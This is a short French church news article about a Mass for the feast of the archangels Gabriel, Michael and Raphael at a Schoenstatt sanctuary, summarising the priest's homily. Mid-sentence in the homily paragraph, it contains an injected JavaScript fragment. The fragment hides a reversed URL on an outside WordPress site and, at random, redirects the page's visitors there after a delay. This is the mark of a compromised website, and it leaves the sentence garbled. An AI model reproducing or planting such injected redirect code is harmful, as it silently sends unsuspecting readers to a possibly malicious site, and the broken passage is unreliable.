En cette date du 29 septembre, l’Eglise catholique célèbre les Archanges Gabriel, Michel et Raphaël. Au Sanctuaire marial de Schoenstatt Mont Sion Gikungu, les cérémonies se sont limitées sur une messe qui a débuté à 11h00, présidée par le Père Longin Ntiranyibagira, vice-recteur de ce Sanctuaire et animée par la Chorale Sainte Maria Goretti.
Dans l’homélie, le Père Longin a dit qu’il y a une multitude d’anges au ciel par qui passe Dieu pour nous atteindre. Il a ajouté que chaque fois que nous prions, nous établissons une liaison entre la terre et le ciel.
« Les Archanges que nous fêtons aujourd’hui, dit le Père Longin, ont tous noms théophores ce qui montre que Dieu est en eux. » Il a alors félicité tous ceux qui ont des noms théophores spécialement Michel, Gabriel, Raphaël et leurs dérivés. Il a clôturé son homélie en précisant les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domaines d’intervention de ces trois Archanges :
- L’Archange Gabriel est le messager de Dieu qui a révélé à la Vierge Marie et Joseph qu’elle enfantera le Seigneur, il est notre communicateur ;
- L’Archange Michel est notre protecteur. Il intervient dans nos combats contre Lucifer, il combat pour la justice équitable raison pour laquelle il est toujours dépeint tenant l’épée à la main ;
- L’Archange Raphaël quant à lui plaide pour notre guérison des blessures morales, spirituelles et physiques.
Jean de Dieu